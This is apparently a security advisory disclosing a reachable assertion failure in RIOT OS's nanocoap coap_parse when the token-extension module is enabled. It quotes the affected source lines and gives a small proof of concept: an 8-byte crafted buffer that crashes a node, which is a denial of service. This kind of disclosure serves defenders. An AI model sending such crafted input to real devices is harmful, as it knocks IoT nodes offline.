coap_parse: Reachable failing assertion with nanocoap_token_ext

Summary

With USEMODULE += nanocoap_token_ext, the coap_parse function contains a reachable failing assertion which can be triggered by a malicious attacker with a crafted input. When assertions are enabled, it will enable a denial-of-service by crashing the RIOT node. I have not investigated what happens if assertions are disabled.

Details

If nanocoap_token_ext is enabled coap_hdr_tkl_ext_len contains an assertion ala. assert(hdr->ver_t_tkl & 0x0f != 15):

RIOT/sys/include/net/nanocoap.h

Lines 720 to 722 in b0b3d66

    
           case 15: 
        
               assert(0); 
        
               /* fall-through */

This invariant is enforced by the coap_is_hdr_in_bounds function:

RIOT/sys/net/application_layer/nanocoap/nanocoap.c

Lines 85 to 87 in b0b3d66

    
           if ((coap_get_udp_hdr_const(pkt)->ver_t_tkl & 0x0f) == 15) { 
        
               return false; 
        
           }

However, in coap_parse_udp the coap_is_hdr_in_bounds function is called after coap_hdr_tkl_ext_len is first invoked:

RIOT/sys/net/application_layer/nanocoap/nanocoap.c

Lines 131 to 139 in b0b3d66

    
           uint8_t *pkt_pos = coap_hdr_data_ptr(hdr); 
        
           uint8_t *pkt_end = buf + len; 
        
           pkt->payload = NULL; 
        
           pkt->payload_len = 0; 
        
           memset(pkt->opt_crit, 0, sizeof(pkt->opt_crit)); 
        
           pkt->snips = NULL; 
        
           if (!coap_is_hdr_in_bounds(pkt, len)) {

Because coap_hdr_tkl_ext_len is reachable indirectly via coap_hdr_data_ptr:

RIOT/sys/include/net/nanocoap.h

Lines 774 to 777 in b0b3d66

    
           static inline uint8_t *coap_hdr_data_ptr(const coap_udp_hdr_t *hdr) 
        
           { 
        
               return ((uint8_t *)hdr) + sizeof(coap_udp_hdr_t) + coap_hdr_tkl_ext_len(hdr); 
        
           }

PoC

$ cat examples/basic/hello-world/Makefile
APPLICATION = hello-world
BOARD ?= native
RIOTBASE ?= $(CURDIR)/../../..
DEVELHELP ?= 1

USEMODULE += gnrc_udp
USEMODULE += gnrc_ipv6
USEMODULE += nanocoap
USEMODULE += nanocoap_token_ext

QUIET ?= 1

include $(RIOTBASE)/Makefile.include
$ cat examples/basic/hello-world/main.c
#include <stdint.h>
#include <net/nanocoap.h>

#define INPUT_SIZE 8

int main(void)
{
    coap_pkt_t pkt;
    uint8_t buf[INPUT_SIZE] = {0x0f, 0x0f, 0x0f, 0x0f, 0x0f, 0x0f, 0x0f, 0x0f};

    coap_parse(&pkt, buf, sizeof(buf));
    return 0;
}
$ make BOARD=native64 -C examples/basic/hello-world/
$ ./examples/basic/hello-world/bin/native64/hello-world.elf
RIOT native interrupts/signals initialized.
TZ not set, setting UTC
RIOT native64 board initialized.
RIOT native hardware initialization complete.

main(): This is RIOT! (Version: 2026.07-devel-11-gb0b3d)
sys/include/net/nanocoap.h:721 => FAILED ASSERTION.

Impact

Denial of service.

Introduced in 660c77e.
Discovered through symbolic execution using KLEE.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

coap_parse: Reachable failing assertion with nanocoap_token_ext

Package

Affected versions

Patched versions

Description

Summary

Details

PoC

Impact

Denial of service.

Severity

CVE ID

Weaknesses

Reachable Assertion

Credits

	if ((coap_get_udp_hdr_const(pkt)->ver_t_tkl & 0x0f) == 15) {
	return false;
	}

	uint8_t *pkt_pos = coap_hdr_data_ptr(hdr);
	uint8_t *pkt_end = buf + len;

	pkt->payload = NULL;
	pkt->payload_len = 0;
	memset(pkt->opt_crit, 0, sizeof(pkt->opt_crit));
	pkt->snips = NULL;

	if (!coap_is_hdr_in_bounds(pkt, len)) {

	static inline uint8_t coap_hdr_data_ptr(const coap_udp_hdr_t hdr)
	{
	return ((uint8_t *)hdr) + sizeof(coap_udp_hdr_t) + coap_hdr_tkl_ext_len(hdr);
	}